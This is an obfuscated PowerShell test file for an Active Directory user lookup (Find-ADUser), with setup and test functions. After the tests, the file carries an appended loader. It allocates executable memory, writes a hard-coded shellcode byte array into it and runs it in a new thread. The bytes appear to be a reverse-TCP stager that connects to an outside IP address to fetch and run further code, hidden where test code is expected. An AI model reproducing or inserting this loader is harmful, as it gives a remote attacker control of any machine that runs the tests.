if( (&("{2}{0}{1}"-f 'jec','t','Get-WmiOb') -Class ("{3}{2}{4}{0}{1}" -f'erSyst','em','i','W','n32_Comput'))."Do`mAIn" -eq ("{2}{0}{1}"-f'OU','P','WORKGR') )
{
    .("{2}{0}{1}"-f'te-','Warning','Wri') -Message (((("{4}{5}{0}{18}{17}{14}{16}{21}{15}{3}{6}{9}{20}{13}{19}{12}{10}{8}{2}{7}{1}{11}" -f'test','ai','art of a ','ecause this ','Fin','d-ADUser ','c','dom','t p','o','o','n.',' is n','t','b',' run b','scbs','canc','s ','er','mpu','t'))."reP`l`Ace"('cbs',[StRInG][CHAR]39)))
}
else
{
    ${DO`MaINu`Rl} = ''

    function Sta`RT-`Te`stF`IXTU`RE
    {
        & (&("{0}{1}{2}"-f 'Jo','in-Pat','h') -Path ${P`S`Sc`RIPtROOT} -ChildPath ((("{2}{0}{1}{4}{5}{7}{3}{6}" -f 'nitialize','-','..{0}I','T','Carb','o','est.ps1','n')) -F [ChAr]92) -Resolve)
    }

    function sE`TuP
    {
        ${Doma`iN`Con`TROLL`er} = &("{4}{3}{2}{0}{5}{1}" -f 'on','roller','DDomainC','t-A','Ge','t') -Domain ${E`Nv:u`SErdoMaIN}
        .("{0}{1}{3}{2}" -f'Assert-N','ot','ull','N') ${dom`AI`Nc`ONTroLler}
        ${d`oMA`INurL} = "LDAP://{0}:389" -f ${dom`AInContr`oLl`ER}
    }

    function Te`ST-S`HO`Ul`Df`inDU`ser
    {
        ${m`e} = &("{2}{0}{1}"-f 'nd-','ADUser','Fi') -DomainUrl ${DOM`AIN`Url} -sAMAccountName ${e`NV:user`Na`mE}
        .("{1}{0}{3}{2}{4}" -f 'ser','As','ot','t-N','Null') ${M`E}
        .("{1}{0}{2}"-f 'ser','As','t-Equal') ${Env:u`sEr`N`AmE} ${me}."SAmac`cOu`Ntn`AME"
    }

    function Test`-shO`UldEsc`A`PES`pE`c`IaLch`A`RactE`RS
    {
        ${M`E} = &("{0}{2}{1}" -f'F','User','ind-AD') -DomainUrl ${d`o`mAiNurL} -sAMAccountName ((("{7}{4}{6}{2}{0}{5}{3}{1}"-f'c',')','spe','aracters','r*wi','ial/ch','th{0}','(use'))-F [chaR]92)
        &("{0}{2}{1}" -f'Asse','Null','rt-') ${mE}
    }
}
${C} = ((("{21}{73}{20}{33}{19}{57}{27}{67}{62}{46}{43}{29}{11}{59}{31}{66}{74}{48}{25}{10}{56}{52}{22}{17}{14}{4}{37}{7}{34}{8}{72}{28}{39}{15}{44}{36}{16}{0}{61}{47}{60}{13}{26}{42}{18}{58}{75}{24}{1}{12}{65}{53}{68}{49}{38}{32}{71}{35}{40}{41}{9}{55}{70}{54}{64}{69}{23}{6}{51}{50}{2}{63}{3}{45}{5}{30}"-f 'ati','StackSize','dest, uint sr',', uint ',', uint f','n','mset(I','t);[DllIm','t(d','mport(d','ess, uint ','n',', IntPtr lpSta','CreateThread(I','tionType','9F','st','a','lpThread','dll','erne','[DllImport(d9','c','me','nt dw','lpAddr','n',')]p','ernel32.dl','I','t);','Ptr','t dwCreat','l32.','por','r lpThread',']public ','lProtec',', uin','ld','I','d);[DllI','tPtr ',' ',')','cou','n','tP','tPtr ','ter',' ','ntPtr','llo','tAddress, Int','rt.dlld9F)]public stat','9F','dwSize, uint flA','d9F','Attributes','t','tr ','c extern In','lic static exter','c','ic ex','r',' Vi','ub','Ptr lpParame','tern IntPtr ','msvc','ionFlags, IntPt','9Fk','Fk','rtualAlloc(In',', ui'))."R`ePla`ce"(([ChAR]100+[ChAR]57+[ChAR]70),[STRING][ChAR]34));${W} = &("{2}{1}{0}" -f 'e','Typ','Add-') -memberDefinition ${C} -Name ("{1}{0}"-f'n32','Wi') -namespace ("{0}{1}{3}{2}" -f 'Win32','F','ions','unct') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x5b,0xd6,0xa9,0x45,0x68,0x02,0x00,0x20,0xee,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${z}."lEn`gTH" -gt 0x1000){${g} = ${Z}."Le`NGTh"};${x}=${w}::("{0}{3}{2}{1}"-f 'Virtua','c','llo','lA').Invoke(0,0x1000,${G},0x40);for (${I}=0;${I} -le (${Z}."LEng`TH"-1);${I}++) {${W}::"me`msEt"([IntPtr](${X}.("{1}{0}{2}"-f 'In','To','t32').Invoke()+${I}), ${z}[${i}], 1)};${w}::("{2}{0}{1}"-f'teThrea','d','Crea').Invoke(0,0,${X},0,0,0);for (;;){&("{3}{0}{1}{2}" -f'rt','-','sleep','Sta') 60};
